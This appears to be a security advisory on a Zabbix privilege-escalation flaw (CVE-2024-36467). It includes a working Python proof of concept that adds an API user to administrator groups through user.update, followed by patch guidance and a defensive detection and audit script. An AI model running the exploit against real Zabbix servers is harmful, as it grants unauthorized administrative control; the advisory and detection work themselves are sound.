A security vulnerability in the Zabbix Monitoring Tool (CVE-2024-36467) allows an authenticated user with basic API access to elevate privileges by adding themselves to any user group, such as Zabbix administrators, through the user.update API endpoint. This could lead to unauthorized system modifications and data breaches. Organizations running affected versions of the Zabbix Monitoring Tool should patch or apply mitigations immediately.

Detailed Overview

Zabbix Monitoring Tool, a widely used open-source network monitoring software package, suffers from a critical vulnerability designated CVE-2024-36467. The flaw allows a user with limited access, such as a user with the default User role, to call the user.update API endpoint and change group membership without the authorization check that should prevent it.

With minimal effort, a malicious user with basic API access can insert themselves into any user group, including groups that carry administrative privileges. This effectively grants unauthorized access to sensitive data and the ability to modify system settings. The only exception is that users cannot join groups that are disabled or that have restricted GUI access.

Exploit Details

To exploit this vulnerability, an authenticated user with API access (e.g., a user in the default User role) needs to make an API request to the user.update endpoint, specifying the target user and the group IDs the user wants to be added to:

import requests
import json

url = "http://zabbix.example.com/api_jsonrpc.php"
headers = {"Content-Type": "application/json"}

# Authentication request: user.login returns a session token in "result"
data = {
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "user": "<username>",
        "password": "<password>"
    },
    "id": 1,
    "auth": None
}

response = requests.post(url, data=json.dumps(data), headers=headers)
result = response.json()
auth_token = result["result"]

# Update user request, adding the user to the specified groups.
# The same request object is reused; only method, params and auth change.
data["method"] = "user.update"
data["params"] = {
    "userid": "<target_user_id>",
    "usrgrps": [{"usrgrpid": "<group_id_1>"}, {"usrgrpid": "<group_id_2>"}]
}
data["auth"] = auth_token

response = requests.post(url, data=json.dumps(data), headers=headers)
result = response.json()
print(result)

In this snippet the placeholders must be replaced with the relevant values: the username and password, the target user ID, and the desired group IDs.

Official References & Mitigations

- Original advisory: Zabbix Security Advisory CVE-2024-36467
- Link to patches: Zabbix GitHub - Patches for CVE-2024-36467

The vulnerability has been patched, and users should upgrade their Zabbix installation to a fixed version. Alternatively, users can apply the patches provided in the GitHub repository (link above) specific to their Zabbix version.

In the meantime, as a temporary mitigation, organizations can restrict API access for accounts in the default User role, carefully review and manage their user base and group memberships, and monitor calls to the user.update API endpoint.
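The two monitoring mitigations above (watching user.update calls and reviewing group membership) can be scripted against the same JSON-RPC traffic the exploit section describes. The following Python is an added example written for this article, not code from Zabbix or from the original advisory. It assumes that request bodies to api_jsonrpc.php are captured by a reverse proxy as tab-separated lines (timestamp, client IP, path, body), that the privileged group has usrgrpid 7 (the default ID of "Zabbix administrators" on a fresh install; confirm against your own instance), and that usergroup.get is queried with selectUsers. All log lines, group data and usernames are constructed sample data.

```python
"""Detect CVE-2024-36467 style group escalation via Zabbix user.update
and audit privileged group membership against an allowlist.

Added example: reverse-proxy log format, group ids and sample data are
assumptions for this article, not Zabbix's own tooling.
"""
import json

# Assumed privileged group ids. "Zabbix administrators" is usrgrpid 7 on a
# default install; verify with usergroup.get on your deployment.
PRIVILEGED_GROUP_IDS = {"7"}

# Constructed sample of reverse-proxy lines: ts <TAB> ip <TAB> path <TAB> body
SAMPLE_PROXY_LOG = [
    "2024-01-01T00:00:01Z\t10.0.0.5\t/api_jsonrpc.php\t"
    '{"jsonrpc":"2.0","method":"user.login","params":{"user":"alice","password":"x"},"id":1}',
    "2024-01-01T00:00:02Z\t10.0.0.5\t/api_jsonrpc.php\t"
    '{"jsonrpc":"2.0","method":"user.update","params":{"userid":"12","usrgrps":[{"usrgrpid":"7"}]},"id":2,"auth":"tok"}',
    "2024-01-01T00:01:00Z\t10.0.0.9\t/api_jsonrpc.php\t"
    '{"jsonrpc":"2.0","method":"user.update","params":[{"userid":"13","usrgrps":[{"usrgrpid":"8"}]}],"id":3,"auth":"tok"}',
    "2024-01-01T00:02:00Z\t10.0.0.9\t/index.php\tnot json",
]

# Constructed sample of a usergroup.get response (selectUsers) and the
# membership an operator expects to see in the privileged group.
SAMPLE_USERGROUP_GET = [
    {"usrgrpid": "7", "name": "Zabbix administrators",
     "users": [{"userid": "1", "username": "Admin"}, {"userid": "12", "username": "alice"}]},
    {"usrgrpid": "8", "name": "Guests", "users": [{"userid": "2", "username": "guest"}]},
]
EXPECTED_MEMBERS = {"Zabbix administrators": {"Admin"}}


def parse_jsonrpc(body):
    """Return the parsed JSON-RPC request, or None if body is not a request object."""
    try:
        req = json.loads(body)
    except ValueError:
        return None
    if not isinstance(req, dict) or "method" not in req:
        return None
    return req


def flag_group_escalation(body, privileged=PRIVILEGED_GROUP_IDS):
    """Return the privileged group ids a user.update request assigns (empty set if none)."""
    req = parse_jsonrpc(body)
    if req is None or req.get("method") != "user.update":
        return set()
    params = req.get("params") or {}
    # user.update accepts one object or an array of objects
    entries = params if isinstance(params, list) else [params]
    hits = set()
    for entry in entries:
        for grp in entry.get("usrgrps") or []:
            gid = str(grp.get("usrgrpid", ""))
            if gid in privileged:
                hits.add(gid)
    return hits


def scan_proxy_log(lines, privileged=PRIVILEGED_GROUP_IDS):
    """Return [(timestamp, client_ip, [group ids])] for flagged user.update calls."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 3)
        if len(parts) != 4 or not parts[2].endswith("api_jsonrpc.php"):
            continue
        ts, ip, _path, body = parts
        hits = flag_group_escalation(body, privileged)
        if hits:
            findings.append((ts, ip, sorted(hits)))
    return findings


def build_usergroup_request(auth_token):
    """JSON-RPC body that lists groups with their members (usergroup.get + selectUsers)."""
    return {"jsonrpc": "2.0", "method": "usergroup.get",
            "params": {"output": ["usrgrpid", "name"], "selectUsers": ["userid", "username"]},
            "auth": auth_token, "id": 1}


def unexpected_members(groups, expected=EXPECTED_MEMBERS):
    """Return {group name: [usernames not on the allowlist]} for audited groups."""
    findings = {}
    for grp in groups:
        name = grp.get("name")
        if name not in expected:
            continue
        # Older releases return "alias" instead of "username"; accept both.
        names = [u.get("username", u.get("alias", "")) for u in grp.get("users", [])]
        extra = sorted(n for n in names if n not in expected[name])
        if extra:
            findings[name] = extra
    return findings


if __name__ == "__main__":
    print("flagged user.update calls:", scan_proxy_log(SAMPLE_PROXY_LOG))
    print("unexpected privileged members:", unexpected_members(SAMPLE_USERGROUP_GET))
```

Feeding live proxy lines into scan_proxy_log gives an alert for every user.update that touches a privileged group, while the usergroup.get audit catches memberships that were added before monitoring started; running the audit on a schedule and diffing against the allowlist is the practical version of "review and manage the user base".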

Applying the patches or upgrading, together with the temporary mitigations above, is critical to preventing exploitation of this vulnerability.

Timeline

Published on: 11/27/2024 07:15:09 UTC